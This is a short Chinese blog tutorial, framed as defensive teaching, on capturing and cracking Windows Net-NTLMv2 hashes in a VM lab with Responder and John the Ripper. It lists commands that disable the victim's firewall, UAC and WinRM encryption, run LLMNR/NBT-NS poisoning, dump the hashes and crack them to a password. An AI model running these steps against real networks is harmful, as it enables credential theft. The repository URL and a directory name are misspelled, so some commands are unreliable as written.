作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途
Responder捕获Win哈希
实验环境
VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置
netsh advfirewall set allprofiles state off
winrm quickconfig
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重启
Responder
responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求
安装Responder
Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境
apt-get install build-essential git python-dev
从github下载源码
git clone https://github.com/lagandx/Responder.git
cd Resopnder/
git pull
Responder参数
Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器
获取NTLMv2哈希
1.开始毒化,监听请求信息
./Responder.py -wfF -I eth0
此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机
时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值
./DumpHash.py
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解
john DumpNTLMv2.txt
破解出用户名hacker,密码password1